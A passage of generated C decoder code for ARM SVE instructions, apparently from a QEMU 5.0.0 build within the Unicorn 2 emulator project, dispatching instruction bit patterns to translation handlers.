0x1: /* 00100101 ..01.... 11...... ...0.... */ switch ((insn >> 17) & 0x7) { case 0x0: /* 00100101 ..01000. 11...... ...0.... */ disas_sve_extract_disas_sve_Fmt_64(ctx, &u.f_disas_sve31, insn); switch (insn & 0x00c1020f) { case 0x00400000: /* 00100101 01010000 11....0. ...00000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:636 */ if (trans_PTEST(ctx, &u.f_disas_sve31)) return true; return false; } return false; case 0x4: /* 00100101 ..01100. 11...... ...0.... */ switch ((insn >> 10) & 0xf) { case 0x0: /* 00100101 ..01100. 110000.. ...0.... */ disas_sve_extract_pd_pn_e0(ctx, &u.f_rr_esz, insn); switch (insn & 0x00c10200) { case 0x00400000: /* 00100101 01011000 1100000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:657 */ if (trans_PFIRST(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x1: /* 00100101 ..01100. 110001.. ...0.... */ disas_sve_extract_pd_pn(ctx, &u.f_rr_esz, insn); switch (insn & 0x00010200) { case 0x00010000: /* 00100101 ..011001 1100010. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:660 */ if (trans_PNEXT(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x8: /* 00100101 ..01100. 111000.. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:639 */ disas_sve_extract_disas_sve_Fmt_65(ctx, &u.f_ptrue, insn); if (trans_PTRUE(ctx, &u.f_ptrue)) return true; return false; case 0x9: /* 00100101 ..01100. 111001.. ...0.... */ disas_sve_extract_disas_sve_Fmt_67(ctx, &u.f_disas_sve33, insn); switch (insn & 0x00c103e0) { case 0x00000000: /* 00100101 00011000 11100100 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:645 */ if (trans_PFALSE(ctx, &u.f_disas_sve33)) return true; return false; } return false; case 0xc: /* 00100101 ..01100. 111100.. ...0.... */ switch (insn & 0x00810200) { case 0x00000000: /* 00100101 0.011000 1111000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:648 */ disas_sve_extract_disas_sve_Fmt_68(ctx, &u.f_disas_sve34, insn); if (trans_RDFFR_p(ctx, &u.f_disas_sve34)) return true; return false; case 0x00010000: /* 00100101 0.011001 1111000. ...0.... 
*/ disas_sve_extract_disas_sve_Fmt_67(ctx, &u.f_disas_sve33, insn); switch (insn & 0x004001e0) { case 0x00000000: /* 00100101 00011001 11110000 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:651 */ if (trans_RDFFR(ctx, &u.f_disas_sve33)) return true; return false; } return false; } return false; } return false; } return false; } return false; case 0x0000c010: /* 00100101 ..0..... 11...... ...1.... */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); switch (insn & 0x00900200) { case 0x00000000: /* 00100101 0.00.... 11....0. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:666 */ if (trans_BRKPB(ctx, &u.f_rprr_s)) return true; return false; } return false; } return false; case 0x01200000: /* 00100101 ..1..... ........ ........ */ switch ((insn >> 14) & 0x3) { case 0x0: /* 00100101 ..1..... 00...... ........ */ switch (insn & 0x00002400) { case 0x00000400: /* 00100101 ..1..... 000..1.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:701 */ disas_sve_extract_disas_sve_Fmt_71(ctx, &u.f_disas_sve37, insn); if (trans_WHILE(ctx, &u.f_disas_sve37)) return true; return false; case 0x00002000: /* 00100101 ..1..... 001..0.. ........ */ disas_sve_extract_disas_sve_Fmt_70(ctx, &u.f_disas_sve36, insn); switch (insn & 0x0080180f) { case 0x00800000: /* 00100101 1.1..... 001000.. ....0000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:698 */ if (trans_CTERM(ctx, &u.f_disas_sve36)) return true; return false; } return false; } return false; case 0x2: /* 00100101 ..1..... 10...... ........ */ switch (insn & 0x001c0200) { case 0x00000000: /* 00100101 ..1000.. 10....0. ........ */ disas_sve_extract_rd_pg4_pn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 16) & 0x3) { case 0x0: /* 00100101 ..100000 10....0. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:680 */ if (trans_CNTP(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x00080000: /* 00100101 ..1010.. 10....0. ........ */ switch ((insn >> 10) & 0xf) { case 0x0: /* 00100101 ..1010.. 1000000. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:693 */ disas_sve_extract_incdec2_pred(ctx, &u.f_incdec2_pred, insn); u.f_incdec2_pred.d = extract32(insn, 17, 1); u.f_incdec2_pred.u = extract32(insn, 16, 1); if (trans_SINCDECP_z(ctx, &u.f_incdec2_pred)) return true; return false; case 0x2: /* 00100101 ..1010.. 1000100. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:689 */ disas_sve_extract_incdec_pred(ctx, &u.f_incdec_pred, insn); u.f_incdec_pred.d = extract32(insn, 17, 1); u.f_incdec_pred.u = extract32(insn, 16, 1); if (trans_SINCDECP_r_32(ctx, &u.f_incdec_pred)) return true; return false; case 0x3: /* 00100101 ..1010.. 1000110. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:690 */ disas_sve_extract_incdec_pred(ctx, &u.f_incdec_pred, insn); u.f_incdec_pred.d = extract32(insn, 17, 1); u.f_incdec_pred.u = extract32(insn, 16, 1); if (trans_SINCDECP_r_64(ctx, &u.f_incdec_pred)) return true; return false; case 0x4: /* 00100101 ..1010.. 1001000. ........ */ disas_sve_extract_disas_sve_Fmt_69(ctx, &u.f_disas_sve35, insn); switch (insn & 0x00c3001f) { case 0x00000000: /* 00100101 00101000 1001000. 
...00000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:654 */ if (trans_WRFFR(ctx, &u.f_disas_sve35)) return true; return false; } return false; } return false; case 0x000c0000: /* 00100101 ..1011.. 10....0. ........ */ switch (insn & 0x00023c00) { case 0x00000000: /* 00100101 ..10110. 1000000. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:686 */ disas_sve_extract_incdec2_pred(ctx, &u.f_incdec2_pred, insn); u.f_incdec2_pred.d = extract32(insn, 16, 1); u.f_incdec2_pred.u = 1; if (trans_INCDECP_z(ctx, &u.f_incdec2_pred)) return true; return false; case 0x00000800: /* 00100101 ..10110. 1000100. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:683 */ disas_sve_extract_incdec_pred(ctx, &u.f_incdec_pred, insn); u.f_incdec_pred.d = extract32(insn, 16, 1); u.f_incdec_pred.u = 1; if (trans_INCDECP_r(ctx, &u.f_incdec_pred)) return true; return false; case 0x00001000: /* 00100101 ..10110. 1001000. ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch (insn & 0x00c101ff) { case 0x00000000: /* 00100101 00101100 10010000 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:642 */ if (trans_SETFFR(ctx, &u.f_disas_sve32)) return true; return false; } return false; } return false; } return false; case 0x3: /* 00100101 ..1..... 11...... ........ */ switch ((insn >> 16) & 0x1f) { case 0x0: /* 00100101 ..100000 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:712 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_ADD_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x1: /* 00100101 ..100001 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:713 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_SUB_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x3: /* 00100101 ..100011 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:714 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_SUBR_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x4: /* 00100101 ..100100 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:715 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_SQADD_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x5: /* 00100101 ..100101 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:716 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_UQADD_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x6: /* 00100101 ..100110 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:717 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_SQSUB_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x7: /* 00100101 ..100111 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:718 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_UQSUB_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x8: /* 00100101 ..101000 11...... ........ 
*/ disas_sve_extract_rdn_i8s(ctx, &u.f_rri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..101000 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:721 */ if (trans_SMAX_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0x9: /* 00100101 ..101001 11...... ........ */ disas_sve_extract_rdn_i8u(ctx, &u.f_rri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..101001 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:722 */ if (trans_UMAX_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0xa: /* 00100101 ..101010 11...... ........ */ disas_sve_extract_rdn_i8s(ctx, &u.f_rri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..101010 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:723 */ if (trans_SMIN_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0xb: /* 00100101 ..101011 11...... ........ */ disas_sve_extract_rdn_i8u(ctx, &u.f_rri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..101011 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:724 */ if (trans_UMIN_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0x10: /* 00100101 ..110000 11...... ........ */ disas_sve_extract_rdn_i8s(ctx, &u.f_rri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..110000 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:727 */ if (trans_MUL_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0x18: /* 00100101 ..111000 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:709 */ disas_sve_extract_disas_sve_Fmt_73(ctx, &u.f_disas_sve38, insn); if (trans_DUP_i(ctx, &u.f_disas_sve38)) return true; return false; case 0x19: /* 00100101 ..111001 11...... ........ */ disas_sve_extract_disas_sve_Fmt_72(ctx, &u.f_disas_sve38, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..111001 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:706 */ if (trans_FDUP(ctx, &u.f_disas_sve38)) return true; return false; } return false; } return false; } return false; } return false; case 0x22: /* 0100010. ........ ........ ........ */ switch (insn & 0x01a0f800) { case 0x00800000: /* 01000100 1.0..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:730 */ disas_sve_extract_disas_sve_Fmt_74(ctx, &u.f_disas_sve39, insn); if (trans_DOT_zzz(ctx, &u.f_disas_sve39)) return true; return false; case 0x00a00000: /* 01000100 1.1..... 00000... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 01000100 101..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:733 */ disas_sve_extract_disas_sve_Fmt_75(ctx, &u.f_disas_sve40, insn); if (trans_DOT_zzx(ctx, &u.f_disas_sve40)) return true; return false; case 0x1: /* 01000100 111..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:735 */ disas_sve_extract_disas_sve_Fmt_76(ctx, &u.f_disas_sve40, insn); if (trans_DOT_zzx(ctx, &u.f_disas_sve40)) return true; return false; } return false; } return false; case 0x32: /* 0110010. 
........ ........ ........ */ switch (insn & 0x01208000) { case 0x00000000: /* 01100100 ..0..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:743 */ disas_sve_extract_disas_sve_Fmt_78(ctx, &u.f_disas_sve42, insn); if (trans_FCMLA_zpzzz(ctx, &u.f_disas_sve42)) return true; return false; case 0x00008000: /* 01100100 ..0..... 1....... ........ */ disas_sve_extract_disas_sve_Fmt_77(ctx, &u.f_disas_sve41, insn); switch (insn & 0x001e6000) { case 0x00000000: /* 01100100 ..00000. 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:739 */ if (trans_FCADD(ctx, &u.f_disas_sve41)) return true; return false; } return false; case 0x00200000: /* 01100100 ..1..... 0....... ........ */ switch (insn & 0x00807000) { case 0x00000000: /* 01100100 0.1..... 0000.... ........ */ disas_sve_extract_disas_sve_Fmt_81(ctx, &u.f_disas_sve44, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 01100100 0.1..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:755 */ if (trans_FMLA_zzxz(ctx, &u.f_disas_sve44)) return true; return false; } return false; case 0x00002000: /* 01100100 0.1..... 0010.... ........ */ disas_sve_extract_disas_sve_Fmt_84(ctx, &u.f_disas_sve45, insn); switch ((insn >> 10) & 0x3) { case 0x0: /* 01100100 0.1..... 001000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:765 */ if (trans_FMUL_zzx(ctx, &u.f_disas_sve45)) return true; return false; } return false; case 0x00800000: /* 01100100 1.1..... 0000.... ........ */ switch (insn & 0x00400800) { case 0x00000000: /* 01100100 101..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:757 */ disas_sve_extract_disas_sve_Fmt_82(ctx, &u.f_disas_sve44, insn); if (trans_FMLA_zzxz(ctx, &u.f_disas_sve44)) return true; return false; case 0x00400000: /* 01100100 111..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:759 */ disas_sve_extract_disas_sve_Fmt_83(ctx, &u.f_disas_sve44, insn); if (trans_FMLA_zzxz(ctx, &u.f_disas_sve44)) return true; return false; } return false; case 0x00801000: /* 01100100 1.1..... 0001.... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 01100100 101..... 0001.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:747 */ disas_sve_extract_disas_sve_Fmt_79(ctx, &u.f_disas_sve43, insn); if (trans_FCMLA_zzxz(ctx, &u.f_disas_sve43)) return true; return false; case 0x1: /* 01100100 111..... 0001.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:749 */ disas_sve_extract_disas_sve_Fmt_80(ctx, &u.f_disas_sve43, insn); if (trans_FCMLA_zzxz(ctx, &u.f_disas_sve43)) return true; return false; } return false; case 0x00802000: /* 01100100 1.1..... 0010.... ........ */ switch (insn & 0x00400c00) { case 0x00000000: /* 01100100 101..... 001000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:767 */ disas_sve_extract_disas_sve_Fmt_85(ctx, &u.f_disas_sve45, insn); if (trans_FMUL_zzx(ctx, &u.f_disas_sve45)) return true; return false; case 0x00400000: /* 01100100 111..... 001000.. ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:768 */ disas_sve_extract_disas_sve_Fmt_86(ctx, &u.f_disas_sve45, insn); if (trans_FMUL_zzx(ctx, &u.f_disas_sve45)) return true; return false; } return false; } return false; case 0x01000000: /* 01100101 ..0..... 0....... ........ */ switch ((insn >> 13) & 0x3) { case 0x0: /* 01100101 ..0..... 000..... ........ */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 10) & 0x7) { case 0x0: /* 01100101 ..0..... 000000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:800 */ if (trans_FADD_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x1: /* 01100101 ..0..... 000001.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:801 */ if (trans_FSUB_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x2: /* 01100101 ..0..... 000010.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:802 */ if (trans_FMUL_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x3: /* 01100101 ..0..... 000011.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:803 */ if (trans_FTSMUL(ctx, &u.f_rrr_esz)) return true; return false; case 0x6: /* 01100101 ..0..... 000110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:804 */ if (trans_FRECPS(ctx, &u.f_rrr_esz)) return true; return false; case 0x7: /* 01100101 ..0..... 000111.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:805 */ if (trans_FRSQRTS(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x1: /* 01100101 ..0..... 001..... ........ */ switch ((insn >> 16) & 0x1f) { case 0x0: /* 01100101 ..000000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:772 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FADDV(ctx, &u.f_rpr_esz)) return true; return false; case 0x4: /* 01100101 ..000100 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:773 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FMAXNMV(ctx, &u.f_rpr_esz)) return true; return false; case 0x5: /* 01100101 ..000101 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:774 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FMINNMV(ctx, &u.f_rpr_esz)) return true; return false; case 0x6: /* 01100101 ..000110 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:775 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FMAXV(ctx, &u.f_rpr_esz)) return true; return false; case 0x7: /* 01100101 ..000111 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:776 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FMINV(ctx, &u.f_rpr_esz)) return true; return false; case 0xe: /* 01100101 ..001110 001..... ........ */ disas_sve_extract_rd_rn(ctx, &u.f_rr_esz, insn); switch ((insn >> 10) & 0x7) { case 0x4: /* 01100101 ..001110 001100.. ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:780 */ if (trans_FRECPE(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0xf: /* 01100101 ..001111 001..... ........ */ disas_sve_extract_rd_rn(ctx, &u.f_rr_esz, insn); switch ((insn >> 10) & 0x7) { case 0x4: /* 01100101 ..001111 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:781 */ if (trans_FRSQRTE(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x10: /* 01100101 ..010000 001..... ........ */ disas_sve_extract_pd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..010000 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:785 */ if (trans_FCMGE_ppz0(ctx, &u.f_rpr_esz)) return true; return false; case 0x1: /* 01100101 ..010000 001..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:786 */ if (trans_FCMGT_ppz0(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x11: /* 01100101 ..010001 001..... ........ */ disas_sve_extract_pd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..010001 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:787 */ if (trans_FCMLT_ppz0(ctx, &u.f_rpr_esz)) return true; return false; case 0x1: /* 01100101 ..010001 001..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:788 */ if (trans_FCMLE_ppz0(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x12: /* 01100101 ..010010 001..... ........ */ disas_sve_extract_pd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..010010 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:789 */ if (trans_FCMEQ_ppz0(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x13: /* 01100101 ..010011 001..... ........ */ disas_sve_extract_pd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..010011 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:790 */ if (trans_FCMNE_ppz0(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x18: /* 01100101 ..011000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:795 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FADDA(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x2: /* 01100101 ..0..... 010..... ........ */ disas_sve_extract_pd_pg_rn_rm(ctx, &u.f_rprr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..0..... 010..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:341 */ if (trans_FCMGE_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 01100101 ..0..... 010..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:342 */ if (trans_FCMGT_ppzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x3: /* 01100101 ..0..... 011..... ........ */ disas_sve_extract_pd_pg_rn_rm(ctx, &u.f_rprr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..0..... 011..... ...0.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:343 */ if (trans_FCMEQ_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 01100101 ..0..... 011..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:344 */ if (trans_FCMNE_ppzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; } return false; case 0x01008000: /* 01100101 ..0..... 1....... ........ */ switch ((insn >> 13) & 0x3) { case 0x0: /* 01100101 ..0..... 100..... ........ */ switch ((insn >> 19) & 0x3) { case 0x0: /* 01100101 ..000... 100..... ........ */ switch ((insn >> 16) & 0x7) { case 0x0: /* 01100101 ..000000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:810 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FADD_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 01100101 ..000001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:811 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FSUB_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x2: /* 01100101 ..000010 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:812 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMUL_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x3: /* 01100101 ..000011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:813 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_FSUB_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x4: /* 01100101 ..000100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:814 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMAXNM_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x5: /* 01100101 ..000101 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:815 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMINNM_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x6: /* 01100101 ..000110 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:816 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMAX_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x7: /* 01100101 ..000111 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:817 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMIN_zpzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x1: /* 01100101 ..001... 100..... ........ */ switch ((insn >> 16) & 0x7) { case 0x0: /* 01100101 ..001000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:818 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FABD(ctx, &u.f_rprr_esz)) 